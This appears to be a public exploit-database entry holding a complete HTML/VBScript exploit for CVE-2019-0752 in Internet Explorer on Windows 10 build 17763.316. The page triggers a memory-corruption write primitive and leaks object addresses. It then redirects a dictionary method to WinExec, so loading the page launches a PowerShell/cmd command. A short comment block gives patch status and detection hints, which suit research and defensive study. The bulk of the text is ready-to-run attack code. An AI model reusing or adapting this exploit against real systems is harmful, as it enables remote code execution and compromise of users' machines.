"Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption"

Author

"Simon Zuckerbraun"

Platform

windows

Release date

2019-05-24

<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752                                      -->
<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level)               -->
<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->

<!-- Tgroupcrew@gmail.com -->

<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get    -->
<!-- all the way to RCE using no shellcode.                                                     -->

<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10.                              -->
<!--    (h/t: James Forshaw, Google Project Zero)                                               -->

<!-- Review notes (defensive context):                                                          -->
<!-- * Both CVEs named above were addressed by Microsoft security updates that followed the     -->
<!--   Feb. 2019 patch level this page targets; a current patch level is not expected to be     -->
<!--   affected. The module offsets hard-coded in Exploit() (scrrun / kernel32 deltas) are     -->
<!--   tied to that exact build, which is why the title pins 17763.316.                         -->
<!-- * Detection: an x-ua-compatible meta forcing a legacy document mode together with a        -->
<!--   script block whose language is VBScript.Encode is the static fingerprint of this page.   -->
<!--   VBScript is disabled by default for IE11 Internet-zone content on patched Windows 10     -->
<!--   builds (later 2019 cumulative updates), which blocks the script block from running.     -->
<!-- * Behavioural detection: Exploit() ends by having the browser launch a PowerShell / cmd    -->
<!--   command line, so child-process monitoring on iexplore.exe is the practical alert point.  -->

<html>
<meta http-equiv="x-ua-compatible" content="IE=8">
<meta http-equiv="Expires" content="-1">
<body>
	<div id="container1" style="overflow:scroll; width: 10px">
		<div id="content1" style="width:5000000px">
			Content
		</div>
	</div>
<script language="VBScript.Encode">
Dim ar1(&h3000000)
Dim ar2(1000)
Dim gremlin
addressOfGremlin = &h28281000
Class MyClass
	Private mValue
	Public Property Let Value(v)
		mValue = v
	End Property
	Public Default Property Get P
		P = mValue				' Where to write
	End Property
End Class
Sub TriggerWrite(where, val)
	Dim v1
	Set v1 = document.getElementById("container1")
	v1.scrollLeft = val		' Write this value (Maximum: 0x001767dd)
	Dim c
	Set c = new MyClass
	c.Value = where
	Set v1.scrollLeft = c
End Sub
' Our vulnerability does not immediately give us an unrestricted
' write (though we could manufacture one). For our purposes, the
' following is sufficient. It writes an arbitrary DWORD to an
' arbitrary location, and sets the subsequent 3 bytes to zero.
Sub WriteInt32With3ByteZeroTrailer(addr, val)
	TriggerWrite addr    , (val) AND &hff
	TriggerWrite addr + 1, (val\&h100) AND &hff
	TriggerWrite addr + 2, (val\&h10000) AND &hff
	TriggerWrite addr + 3, (val\&h1000000) AND &hff
End Sub
Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str)
	For i = 0 To Len(str) - 1
		TriggerWrite addr + i, Asc(Mid(str, i + 1, 1))
	Next
End Sub
Function ReadInt32(addr)
	WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr
	ReadInt32 = ar1(gremlin)
End Function
Function LeakAddressOfObject(obj)
	Set ar1(gremlin + 1) = obj
	LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18)
End Function
Sub Exploit()
	' Corrupt vt of one array element (the "gremlin")
	TriggerWrite addressOfGremlin, &h4003	' VT_BYREF | VT_I4
	For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100
		If Not IsEmpty(ar1(i)) Then
			gremlin = i
			Exit For
		End If
	Next
	
	If IsEmpty(gremlin) Then
		MsgBox "Could not find gremlin"
		Exit Sub
	End If
	
	For i = 0 To UBound(ar2)
		Set ar2(i) = CreateObject("Scripting.Dictionary")
	Next
	
	Set dict = ar2(UBound(ar2) / 2)
	addressOfDict = LeakAddressOfObject(dict)
	vtableOfDict = ReadInt32(addressOfDict)
	scrrun = vtableOfDict - &h11fc
	kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90
	winExec = kernel32 + &h5d380
	
	dict.Exists "dummy"		' Make a dispatch call, just to populate pld
	' Relocate pld to ensure its address doesn't contain a null byte
	pld = ReadInt32(addressOfDict + &h3c)
	fakePld = &h28281020
	For i = 0 To 3 - 1
		WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i)
	Next
	
	fakeVtable = &h28282828		' ASCII "(((("
	For i = 0 To 21
		If i = 12 Then		' Dictionary.Exists
			fptr = winExec
		Else
			fptr = ReadInt32(vtableOfDict + 4 * i)
		End If
		WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr
	Next
	
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA"
	WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld
	WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))"""
	
	On Error Resume Next
	dict.Exists "dummy"		' Wheeee!!
	
	' A little cleanup to help prevent crashes after the exploit
	For i = 1 To 3
		WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict
		WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2
	Next
	Erase Dict
	Erase ar2
End Sub
Exploit
</script>
</body>
</html>